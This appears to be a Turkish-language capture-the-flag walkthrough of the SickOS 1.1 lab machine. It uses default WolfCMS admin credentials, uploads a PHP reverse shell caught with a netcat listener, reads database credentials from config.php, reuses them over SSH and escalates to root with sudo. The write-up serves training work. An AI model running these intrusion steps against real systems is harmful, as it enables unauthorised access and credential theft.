sikosbanner

# netdiscover

makina ipsi –> 192.168.1.44

#nmap -sS -sV -O -v 192.168.1.44
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 08:00:27:AC:FC:75 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
...

axxxx proxy waxxx proxy -BITCH HOW TO SET PROXY SETTINGS ON FIREFOX? firefox>preferences>advanced>network sekmesinden connection settings

prox

siteye ulastim, once robots.txt dosyasina bakiyorum

User-agent: *
Dissalow: /wolfcms

Wolf Cms yuklu biraz arastirmayla admin sayfasini ve default logini bulup giris sagladim

192.168.1.44/wolfcms/?admin

usr:admin pass:admin olarak giris yaptim

biraz karistirdiktan sonra file upload kismini fark ettim

public altinda shell adli bir klasor actim

php-reverse-shell.php(pentest monkey) isimli dosyayi upload ettim

http://192.168.1.34/wolfcms/public/shell/ indexinden dosyayi calistirmadan once

# nc -nlv 666

komutunu calistirip 666 portundan gelen istekleri dinliyorum

# nc -nlvp 666
Listening on [0.0.0.0] (family 0, port 666)
Connection from 192.168.1.34 60312 received!
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
04:33:45 up 49 min, 0 users, load average: 0.01, 0.02, 0.05
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ echo os.system('/bin/bash')
/bin/sh: 1: Syntax error: "(" unexpected
$ cd /var/www/wolfcms
$ ls -larh
total 52K
drwxrwxrwx 7 root root 4.0K Dec 5 2015 wolf
-rwxrwxrwx 1 root root 0 Dec 5 2015 robots.txt
drwxrwxrwx 5 root root 4.0K Jul 24 21:53 public
-rwxrwxrwx 1 root root 6.7K Dec 5 2015 index.php
-rwxrwxrwx 1 root root 894 Dec 5 2015 favicon.ico
drwxrwxrwx 2 root root 4.0K Dec 5 2015 docs
-rwxrwxrwx 1 root root 3.0K Dec 5 2015 config.php
-rwxrwxrwx 1 root root 403 Dec 5 2015 composer.json
-rwxrwxrwx 1 root root 2.4K Dec 5 2015 README.md
-rwxrwxrwx 1 root root 4.0K Dec 5 2015 CONTRIBUTING.md
-rwxr-xr-x 1 root root 950 Dec 5 2015 .htaccess
drwxrwxrwx 3 root root 4.0K Dec 6 2015 ..
drwxr-xr-x 5 root root 4.0K Dec 5 2015 .

config.php dosyasinda kullanici bilgileri olabileceginden ilk ona bakiyorum

shell$ cat config.php
...
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
...

lel rekt

makina icerisinde gezerken home dizini altinda sickos dizinini gordum

burdan sickos adinda bir kullanici oldugunu anladim

buldugum parolayi kullanarak baglanmayi deniyorum

#ssh [email protected]
[email protected]'s password:
...
[email protected]:~$ id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
[email protected]:~$ sudo su
[sudo] password for sickos:
[email protected]:/home/sickos# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# cd /root
[email protected]:~# ls -larh
total 40K
-rw------- 1 root root 5.2K Dec 6 2015 .viminfo
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-rw------- 1 root root 22 Dec 5 2015 .mysql_history
drwx------ 2 root root 4.0K Sep 22 2015 .cache
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
-rw------- 1 root root 3.7K Dec 6 2015 .bash_history
-rw-r--r-- 1 root root 96 Dec 6 2015 a0216ea4d51874464078c618298b1367.txt
drwxr-xr-x 22 root root 4.0K Sep 22 2015 ..
drwx------ 3 root root 4.0K Dec 6 2015 .
[email protected]:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!

You have Succesfully completed SickOS1.1.

bb